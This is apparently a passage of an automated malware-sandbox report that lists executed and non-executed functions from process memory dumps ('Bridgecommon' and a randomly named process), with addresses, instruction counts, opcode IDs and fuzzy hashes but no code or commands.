                                                                                              • Opcode ID: 3e4e821e7657c25d8f9d6c8c919c51c303f0618dac05bce2cf0e714d3e608535
                                                                                              • Instruction ID: 659018f517e45a709c97139f7504db652f84865055e7a04e4060562b5fce6ad3
                                                                                              • Opcode Fuzzy Hash: 3e4e821e7657c25d8f9d6c8c919c51c303f0618dac05bce2cf0e714d3e608535
                                                                                              • Instruction Fuzzy Hash: 0431F620B1991D0FE7A8FB6C84AA67976C6EF99324B0502BDE40DC32F6DD58A8418241
                                                                                              Function 00007FFD9BAD119D Relevance: .1, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1cc6fa5052bf333912eca7965fd7db1777e2713cbbf2dec5ce33f7ce0f5d6464
                                                                                              • Instruction ID: 49618dd4652abf3dbf4c0de725d7811313040cda29eb049d38d2571cb81dd324
                                                                                              • Opcode Fuzzy Hash: 1cc6fa5052bf333912eca7965fd7db1777e2713cbbf2dec5ce33f7ce0f5d6464
                                                                                              • Instruction Fuzzy Hash: 83318431B0954E8FDB55EB68C8689BD7BF1FFA5300F0546BAD00DD72A2DA68A940C750
                                                                                              Function 00007FFD9BAD0C25 Relevance: .1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a76e692f682c39a097e3af15232d53955c139fef8a18b822a4fbcf7f0492dac8
                                                                                              • Instruction ID: 8ac27a1720ddaeee308c630b4011d0bf04d2fd96d68048d3572dfe2efbf426f6
                                                                                              • Opcode Fuzzy Hash: a76e692f682c39a097e3af15232d53955c139fef8a18b822a4fbcf7f0492dac8
                                                                                              • Instruction Fuzzy Hash: 0021E736B0D6499FE732E7A898710EC7B60EF92226F4542B3D0588B1E3D9682646C785
                                                                                              Function 00007FFD9BAD1B9F Relevance: .1, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9a69246afc0d9513fbabed8dda7716bbc8229d182d0b2629a8138c7b5d53fea0
                                                                                              • Instruction ID: 8ecbdc433f6c6aeabb67a2672d2cfe2d71e1c4d3cbc927a0001d5a233f02f11a
                                                                                              • Opcode Fuzzy Hash: 9a69246afc0d9513fbabed8dda7716bbc8229d182d0b2629a8138c7b5d53fea0
                                                                                              • Instruction Fuzzy Hash: DA216221F0E90E4BEBB4E76884786B86292EFD4711F4643B5D40DC72F2EDB8AE418740
                                                                                              Function 00007FFD9BAD0C40 Relevance: .1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cceb765cd7d278859e5b20285bc2b4182da156627d2ad5c52836a51508e7ff97
                                                                                              • Instruction ID: d56f1f7e036786d0397f16634f791572f8b08ee17f2cff34423b0dc15afac97e
                                                                                              • Opcode Fuzzy Hash: cceb765cd7d278859e5b20285bc2b4182da156627d2ad5c52836a51508e7ff97
                                                                                              • Instruction Fuzzy Hash: CD11ED35A0E28C8FE722DBA888701DC7FB0EF92611F4642F7D084DB2A2D9382645C784
                                                                                              Function 00007FFD9BAD0C48 Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9b740f2f91dfb6a78a785e56724a764c0c26b1490b49d3c9c4ecc45a74a28d0a
                                                                                              • Instruction ID: 89880bc378c7becc4a535ebbbe995d79ff760e0672e7c7a9dc768ba78011436e
                                                                                              • Opcode Fuzzy Hash: 9b740f2f91dfb6a78a785e56724a764c0c26b1490b49d3c9c4ecc45a74a28d0a
                                                                                              • Instruction Fuzzy Hash: E501DE35A0E38C9FE722DBA8C86019C7FB0EF82701F4642E7D044DB2A2D9386A44C780
                                                                                              Function 00007FFD9BAD0C50 Relevance: .0, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e0c25d66f0bd2f0040109aff44b270d5240011debeea609b5aa75535b5ca2caa
                                                                                              • Instruction ID: 4c747736ce06db6f06195de5f38f3eb2660c79216c3e6b300e05bc932a1fe96d
                                                                                              • Opcode Fuzzy Hash: e0c25d66f0bd2f0040109aff44b270d5240011debeea609b5aa75535b5ca2caa
                                                                                              • Instruction Fuzzy Hash: 3A01DF34E0E38D9FE722DBA4887459C7FB0EF56701F5542E7D054DB2A2D9786A44C740
                                                                                              Function 00007FFD9BAD1C2D Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                                              • Instruction ID: 04225abf947b6779623892e0e3b1a668b8e5af2c3aceb391021f9c530c4332bb
                                                                                              • Opcode Fuzzy Hash: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                                              • Instruction Fuzzy Hash: F4F0E134B5981E8AEBB4A754C8647B87362FBD0711F5543F9C00D931A1DEB86A81CB40
                                                                                              Function 00007FFD9BAD0B77 Relevance: .0, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1e558dd8236e8a588d37156f6ebd8144b9593da91a6e1c69f3e2f067ed0d220f
                                                                                              • Instruction ID: 5afcf77b276a09ab29f865372710c162235bc7af3cbe879b44190248c4e77ad2
                                                                                              • Opcode Fuzzy Hash: 1e558dd8236e8a588d37156f6ebd8144b9593da91a6e1c69f3e2f067ed0d220f
                                                                                              • Instruction Fuzzy Hash: 7BF02B3171EA49CFC742DB38DC999E47F60EF47205BAA15FAC08AC7572C220596ECB41
                                                                                              Function 00007FFD9BAD1CDA Relevance: .0, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                                              • Instruction ID: 5b195def51be91ae4969184ead09916cb35b04be2a8bfae561cac835b3aa5050
                                                                                              • Opcode Fuzzy Hash: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                                              • Instruction Fuzzy Hash: 98F0D024F0D40E4AEBB4D758C8786B83352EFD0711F5543B5C40D972F5DD786A458640
                                                                                              Function 00007FFD9BAD42E9 Relevance: .0, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 56095de108985ef0d1b557f1b23a94601d3dbc44fd0f00b7b83b806b59c34ec8
                                                                                              • Instruction ID: 69be8b57e7d9f1c4728cf9c0cefee2d43330e2ad13ae5cd1229bd57d71113dcb
                                                                                              • Opcode Fuzzy Hash: 56095de108985ef0d1b557f1b23a94601d3dbc44fd0f00b7b83b806b59c34ec8
                                                                                              • Instruction Fuzzy Hash: B3F02270918A1C8FCF98DB48C495EE9B7F1FB68305F114199914AE7260CB31EA80CF85
                                                                                              Function 00007FFD9BAD2AD5 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction ID: 80f32f3af981112524dfa9caf3547bb5af2cc3d6dc48dfb79d6b70ebd687c03b
                                                                                              • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction Fuzzy Hash: 4DE01230F0D11A46FBB49754D8617F962B0EBD4300F1121B8D50E933D1DD78AF81CA49
                                                                                              Function 00007FFD9BAD06A5 Relevance: .0, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction ID: ee4550b84af7779471804bd44f4eca39960630772f8e243641bbcc622fd8accc
                                                                                              • Opcode Fuzzy Hash: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction Fuzzy Hash: 21C04C05F5B51F01F43577EE54760ACB5409BD5A10FD70372D50D840E19CED22D5815E
                                                                                              Function 00007FFD9BAD1310 Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction ID: ea4277a05fc08a7e60f9c3051bcf18043e5bf4e6c8f2dac607c17467776c4421
                                                                                              • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction Fuzzy Hash: 0CC08C3051180C8FC908EB28C88480433A0FB09300BC20090E009C7270E259DDC2C740
                                                                                              Function 00007FFD9BAD4E17 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction ID: 0878ed8e344642cdfa69e7fdeaa9ca7b4371213ce7a24820e0fcb3aa192dbb57
                                                                                              • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction Fuzzy Hash: E0C08CA1E1820945E33487A048391AE73818F80220F928772805DA60A5EE6856429680
                                                                                              Function 00007FFD9BAD2555 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 32e7fbaf4abd05d9173681fc5712a29696d9faee7d498aecc04d894edf43d1e9
                                                                                              • Instruction ID: d0aef74e046fca9d5fff606be4ee067224dbd847e4fa52369125de9ac5e83069
                                                                                              • Opcode Fuzzy Hash: 32e7fbaf4abd05d9173681fc5712a29696d9faee7d498aecc04d894edf43d1e9
                                                                                              • Instruction Fuzzy Hash: 4DC08C00F1881E03F359630804301BE04838F8436CF4006B4E01E862DECC0C592106C7
                                                                                              Function 00007FFD9BAD06C8 Relevance: .0, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction ID: a8191215b382f8a73f31a7feefe0008b463f6229fc6eb65d2ed8bfc4d80beb0f
                                                                                              • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction Fuzzy Hash: E5B01200E5740F00E43433FB08660A870409BC4100FC20270D40D8009198DD12944246

                                                                                              Non-executed Functions

                                                                                              Function 00007FFD9BAD09B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: c9$!k9$"s9$#{9
                                                                                              • API String ID: 0-1692736845
                                                                                              • Opcode ID: d7e52fd75661f17e29165b7474adbe63ab1d3a9785f96b054c9bf29c3b28f678
                                                                                              • Instruction ID: ee9c509b4009dccb547055694a689a46b815e2793af6bde88379d6cda017ce85
                                                                                              • Opcode Fuzzy Hash: d7e52fd75661f17e29165b7474adbe63ab1d3a9785f96b054c9bf29c3b28f678
                                                                                              • Instruction Fuzzy Hash: E7419F02B0952605E23A73FD78228FD6B449FA927FB4847B7F45E8D0EB4D096085C2E5

                                                                                              Executed Functions

                                                                                              Function 00007FFD9BAB0D78 Relevance: .3, Instructions: 260COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e431f3bba022c866040d40c2f4671d91900227ffca6520196e36634992abddfc
                                                                                              • Instruction ID: 5dcf3a8bf58af096aa1dc5fd5454251951e099b965a2861b2e34c2a9ee5cd876
                                                                                              • Opcode Fuzzy Hash: e431f3bba022c866040d40c2f4671d91900227ffca6520196e36634992abddfc
                                                                                              • Instruction Fuzzy Hash: 7591F676A18A9D4FE799DB6C88657A87FE0FF9A310F0001BED059C72D6CBB41815C741
                                                                                              Function 00007FFD9BAB08E8 Relevance: .1, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bd7b97700fbc83591aaf34c21eee4255ca39cec996143a422910b2af68da7b3e
                                                                                              • Instruction ID: a8b0ebf61083c4a659264d97e5f89f1dec86feb1d7de1769dbe32a8638e934d6
                                                                                              • Opcode Fuzzy Hash: bd7b97700fbc83591aaf34c21eee4255ca39cec996143a422910b2af68da7b3e
                                                                                              • Instruction Fuzzy Hash: 0231063130D9184FDB68EB5CE88A9B977D0EF9932170545BBE48AC7166D911EC828BC1
                                                                                              Function 00007FFD9BAB0998 Relevance: .1, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 77f30352d60154fc52b10008de3d9f002131716a2c1a22284eaf5b7254232bcf
                                                                                              • Instruction ID: cd28081269ef87dfc299c1df244efc4e034f76207b5072761a756c3108cf4180
                                                                                              • Opcode Fuzzy Hash: 77f30352d60154fc52b10008de3d9f002131716a2c1a22284eaf5b7254232bcf
                                                                                              • Instruction Fuzzy Hash: CB313320B0E96D0FE768AB6C94BA67977C2EF99321F0501B9E40DC32F6DC68AC414741
                                                                                              Function 00007FFD9BAB119D Relevance: .1, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2c4838ce05a8094879cf6d725ce994a0c784641b77b3935336dba24176a1b1fa
                                                                                              • Instruction ID: eec9361154281d785acad9703b549aaface78854e899a8ba2670a042e19ed6df
                                                                                              • Opcode Fuzzy Hash: 2c4838ce05a8094879cf6d725ce994a0c784641b77b3935336dba24176a1b1fa
                                                                                              • Instruction Fuzzy Hash: D031C831A0965E8FDB55EBA8C8689FD7BF0FF65300F0545BBD019D72A2DE68A940CB40
                                                                                              Function 00007FFD9BAB0C25 Relevance: .1, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a5b1f07fe85f07d6ffc945aee4f5f2e051beb05fa5f4816fdb8b1fe72e65a7f6
                                                                                              • Instruction ID: 1c853d29c00e7c20e28e589944a7e8f71a7ed769cca73ec82842aa635635c9c5
                                                                                              • Opcode Fuzzy Hash: a5b1f07fe85f07d6ffc945aee4f5f2e051beb05fa5f4816fdb8b1fe72e65a7f6
                                                                                              • Instruction Fuzzy Hash: 1A213832B0D25D8BE732E7A89C210EC7B60EF52325F0546F3D1588B1D3D9386646CB85
                                                                                              Function 00007FFD9BAB1B9F Relevance: .1, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5185e1682075a9f4fa3e19575551a986d4698eeb929d82880fb883d62398dbea
                                                                                              • Instruction ID: 46f7fc3e1612a091fc3f7baddf75177c6609f7ee83276fb3acdf8c43f65ec3f5
                                                                                              • Opcode Fuzzy Hash: 5185e1682075a9f4fa3e19575551a986d4698eeb929d82880fb883d62398dbea
                                                                                              • Instruction Fuzzy Hash: FF21A721F1E92D4BEBB4E76884746B822D2EF94710F5642B5D02DC31F2EDA8AE418F04
                                                                                              Function 00007FFD9BAB0C40 Relevance: .0, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9ec3740fc15716e45fac98fc82db05b4a0d5f544c3cf84d7ffacee3cfff92c19
                                                                                              • Instruction ID: 893e7a09ac4e9683ff9f4abe5faa7138306f7a145d9a7a9cc53d5747be19237d
                                                                                              • Opcode Fuzzy Hash: 9ec3740fc15716e45fac98fc82db05b4a0d5f544c3cf84d7ffacee3cfff92c19
                                                                                              • Instruction Fuzzy Hash: F101D631A0D29C8FE722EBA8C8601DD7FB0EF56310F1545F7D054DB2A2DA3456458B84
                                                                                              Function 00007FFD9BAB0C48 Relevance: .0, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f69cf9ef9d6e6e3ffd33871f457040ea0de6d1b94b19d5afc1e0695df10e6a27
                                                                                              • Instruction ID: 7c1fe6a08f168c37a26143d939a15c3af75ba8df45ef4fd44647cc996cb5138d
                                                                                              • Opcode Fuzzy Hash: f69cf9ef9d6e6e3ffd33871f457040ea0de6d1b94b19d5afc1e0695df10e6a27
                                                                                              • Instruction Fuzzy Hash: 9401B131A0E28C8FE722EBA8C8601DC7FB0EF56310F1541E7D054DB2A2EA346644CB80
                                                                                              Function 00007FFD9BAB0C50 Relevance: .0, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 50da9b5450f4c6c17946791ba529ac9a3ff452ead8e1f47837e476a83bfd6f13
                                                                                              • Instruction ID: a9ecb3d96fa70f08ed9be26fa16c40f6f7870854343ae1c19dbe6cc1f9d75c03
                                                                                              • Opcode Fuzzy Hash: 50da9b5450f4c6c17946791ba529ac9a3ff452ead8e1f47837e476a83bfd6f13
                                                                                              • Instruction Fuzzy Hash: 9001A230E0E28D9FE722EBA488641DD7FB0EF56304F1541E7D054DB2A6EA785744CB81
                                                                                              Function 00007FFD9BAB1C2D Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                                              • Instruction ID: 1b0a4a1503ef4d1be2fc7560012448eefdbcb83c927e80bd312163ef15ea3356
                                                                                              • Opcode Fuzzy Hash: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                                              • Instruction Fuzzy Hash: 74F0E134E5942E8AEBB4A754C8647F87362FB50711F5542B9C01D935A1DEB86A818F40
                                                                                              Function 00007FFD9BAB0B77 Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c7beb6b7f5b78382c11a1b960fa32641821926b01178975d45c95ca75abea066
                                                                                              • Instruction ID: e16b77c3a6c5ddbb1be346f053bcfd3ff3d1fc2b77520a0fe4cfcce980aceca1
                                                                                              • Opcode Fuzzy Hash: c7beb6b7f5b78382c11a1b960fa32641821926b01178975d45c95ca75abea066
